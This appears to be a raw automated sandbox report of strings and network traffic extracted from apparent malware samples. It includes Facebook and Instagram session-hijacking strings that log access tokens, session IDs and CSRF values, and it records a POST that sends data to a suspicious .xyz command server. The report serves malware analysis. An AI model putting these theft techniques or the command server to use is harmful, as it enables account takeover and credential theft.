Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe | String found in binary or memory: http://www.facebook.com/pages/VB-Audio-Software/396002733802606 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe | String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmp | String found in binary or memory: http://www.youtube.comT equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmp | String found in binary or memory: http://www.youtube.comf equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exeString found in binary or memory: qSOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio{83da6326-97a6-4088-9453-a1923f573b29},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},6{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},0{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0FRCFLCBRBLLFFCFRFLIsWow64ProcessKernel32.dllArial-inf db%0.1f db%0.1f %%%i bits%i Hz%i-Input Levelsb1024:b512:b256:b128:Init:Pull loss:Push loss:Buffers:StatisticsOutputres:sr:ch:Input%i smpMax Latency:Internal SR:%i.%i.%i.%iDriver Version:VB-Audio Virtual CableDriver Name:SYSTEM\CurrentControlSet\Services\VB-CableSOFTWARE\VB-Audio\CableVBAudioCableWDM_SRVBAudioCableWDMhttp://www.vb-audio.comhttp://www.facebook.com/pages/VB-Audio-Software/396002733802606The change will take effect on next launch... equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: s://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: s://www.facebook.com/chat/video/videocalldownload.phpbo\\O9 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: 84cfba021a5a6662.xyz
Source: unknownHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz
Source: 56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/D
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/al
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/alD
Source: 56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/f
Source: 56BB1610C0318054.exe, 00000002.00000003.409330449.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/ddd
Source: 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/e
Source: 56BB1610C0318054.exe, 00000002.00000003.391014906.0000000003D78000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/g
Source: 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/r
Source: Cyfj6XGbkd.exe, 00000000.00000002.365614828.0000000000861000.00000004.00000020.sdmp, Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.409330449.0000000003D76000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376093286.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w
Source: 56BB1610C0318054.exe, 00000004.00000002.377383414.00000000005A6000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/wV
Source: 56BB1610C0318054.exe, 00000004.00000003.376093286.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/wd_kb_0x
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/llH
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/llr
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.370858416.00000000007E4000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.377399096.00000000005BB000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz//fine/send
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/e
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/eV
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000004.00000002.377366859.0000000000593000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/w
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/wI
Source: Cyfj6XGbkd.exe, 00000000.00000002.365614828.0000000000861000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/wvx
Source: 56BB1610C0318054.exe, 00000002.00000003.389623868.0000000004129000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: Cyfj6XGbkd.exe, 00000000.00000002.365655774.000000000089B000.00000004.00000020.sdmpString found in binary or memory: http://charlesproxy.com/ssl
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crx
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: 1611970637183.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1611970637183.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1611970637183.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, ecvFEAD.tmp.9.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Cyfj6XGbkd.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 56BB1610C0318054.exeString found in binary or memory: http://docs.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: http://drive.google.com/
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://google.com/chrome
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjIwZTg0ZTY4NTUwZTU4OGJhMzFmNmI5YjE4N2E4NDAyZWVmO
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJhM2VjZmJmYzJjMzAzZjVjMGM1MjhiNDZjYWEyNDY0MGI2M
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA61Ofl?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABzUSt?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsAOZ?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsZuW?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv9IZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhNP?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhax?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvqEs?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvuGs?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvzqT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xDME?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
